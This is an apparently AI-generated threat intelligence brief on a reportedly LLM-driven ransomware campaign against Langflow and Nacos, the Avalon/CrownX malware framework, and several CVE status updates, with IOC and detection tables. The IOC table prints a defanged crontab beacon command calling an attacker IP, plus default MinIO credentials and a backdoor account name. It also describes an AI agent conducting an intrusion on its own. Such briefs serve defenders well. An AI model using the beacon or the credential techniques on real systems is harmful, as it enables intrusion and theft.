Cyber Threat Brief — July 4 2026
⚠️ This report is AI-generated. Always validate findings.
1. JADEPUFFER — First Autonomous LLM-Driven Ransomware
TL;DR: Sysdig TRT documented the first end-to-end agentic ransomware operation where an LLM autonomously exploited Langflow (CVE-2025-3248), harvested credentials, moved laterally, and executed database extortion — all without human intervention. Self-correcting payloads and 31-second fix cycles confirm autonomous operation.
What’s New:
- LLM agent exploited CVE-2025-3248 (Langflow unauthenticated RCE) for initial access, then pivoted to Nacos/MySQL production database
- 600+ distinct Base64-encoded Python payloads with self-narrating natural-language comments — a novel detection signal unique to LLM-generated attack code
- Credential sweep covered LLM provider keys, Chinese cloud providers (Alibaba/Aliyun/Tencent/Huawei), AWS/GCP/Azure, crypto wallets, and database configs
- MinIO object store enumerated with default
minioadmin:minioadmincreds — extractedcredentials.jsonand.envfrom internal bucket - Nacos auth bypass via CVE-2021-29441 + default JWT signing key forgery + direct MySQL
xadminbackdoor injection
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| 45.131.66[.]106 | C2 IP | T1071.001 | Firewall / NDR | Block |
| 64.20.53[.]230 (InterServer AS19318) | Staging/exfil IP | T1041 | Firewall / NDR | Block |
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon'..." | Crontab persistence | T1053.003 | Sysmon EID 1 / auditd | Hunt |
| e78393397[@]proton[.]me | Ransom contact | — | — | Intel |
| 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy | Bitcoin address | — | — | Intel |
README_RANSOM table in MySQL | Ransomware artifact | T1486 | MySQL audit log | Hunt |
Base64-decoded Python with NL comments (# High-ROI databases, # data already backed up) | LLM-generated payload signature | T1059.006 | EDR / Sysmon EID 1 | Hunt |
xadmin user creation in Nacos users table | Backdoor account | T1136.001 | MySQL audit / Nacos auth log | Hunt |
| MinIO default cred probe on port 9000 | Credential abuse | T1078.001 | MinIO access log | Alert |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No rule for Langflow endpoint abuse, Nacos JWT forgery, or MinIO default-cred enumeration |
| Elastic | Linux Suspicious Child Process From Web Server (generic) | No Langflow-specific or agentic-payload signature |
| Sigma | proc_creation_lnx_susp_child_process_from_web_server.yml (generic) | No rule for self-narrating Base64 Python payloads or crontab beacon patterns |
Sources: Sysdig TRT Blog · The Hacker News · SC Media · The Register
2. Avalon/CrownX — Modular Malware Framework with Ransomware
TL;DR: Blackpoint APG disclosed Avalon, a previously undocumented modular framework combining credential theft, lateral movement, and CrownX ransomware — with zero VirusTotal detections since its March 2026 upload. Delivered via ISO-in-Proton-Drive phishing chain.
What’s New:
- Multi-stage delivery: spoofed legal email → Proton Drive password-protected archive →
Secure_Document_CA-283505_pdf.iso→ LNK shortcut execution - Avalon framework modules: credential harvesting (Chromium/Firefox creds, cookies, DPAPI, VPN/SSH/RDP/Wi-Fi, Windows Credential Manager, crypto wallets — MetaMask, Ledger, Electrum, Coinbase)
- CrownX ransomware uses BCrypt APIs with AES-GCM authenticated encryption and transaction-aware file APIs
- Specifically targets recovery/backup systems before encryption
- Zero VirusTotal detections across all engines since March 2026 upload — high evasion
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
Secure_Document_CA-283505_pdf.iso | Delivery artifact | T1566.002 | Email gateway / EDR | Block ISO attachments |
Secure Document CA-283505.pdf.lnk | LNK launcher | T1204.002 | Sysmon EID 1 / EDR | Hunt |
DPAPI CryptUnprotectData calls from non-browser process | Credential theft | T1555.003 | EDR / Sysmon EID 7 | Alert |
| Proton Drive download URLs in email | Phishing infrastructure | T1566.002 | Email gateway | Flag |
| BCrypt + AES-GCM file encryption with volume shadow deletion | Ransomware behavior | T1486 / T1490 | EDR / Sysmon EID 1 | Alert |
| Browser DB access (Login Data, Cookies) by non-browser PID | Credential theft | T1555.003 | EDR | Hunt |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Windows System or Service Stopped (generic, for VSS deletion) | No rule for Avalon framework IOCs or CrownX-specific encryption pattern |
| Elastic | Suspicious DLL Loaded via Side-Loading (generic) | No ISO-delivery or CrownX behavioral signature |
| Sigma | proc_creation_win_vssadmin_delete_shadow.yml (partial) | No Avalon-specific process chain or LNK-from-ISO detection |
Sources: The Hacker News · CyberPress
Status Updates
- CVE-2026-45659 (SharePoint RCE): CISA KEV federal deadline TODAY July 4. Active exploitation confirmed. Patch via May 2026 Patch Tuesday. Original brief.
- CVE-2026-8451 (Citrix NetScaler CitrixBleed∞): Active exploitation ongoing from 146.70.139[.]154 (M247/AS9009). Upgrade to 14.1-72.61+ or 13.1-63.18+. Original brief.
- CVE-2026-50656 (Windows Defender RoguePlanet): Still UNPATCHED zero-day. Splunk ESCU Analytics Story: RoguePlanet now available. WDAC/AppLocker primary mitigation. Original brief.
- CVE-2026-48558 (SimpleHelp OIDC Bypass): Federal deadline July 7. Djinn Stealer/TaskWeaver campaigns ongoing. Patch to 5.5.16+. Original brief.
- CVE-2026-48907 (Joomla JCE RCE): Federal deadline July 7. ITW exploitation ongoing. Patch to JCE 2.9.99.5. Original brief.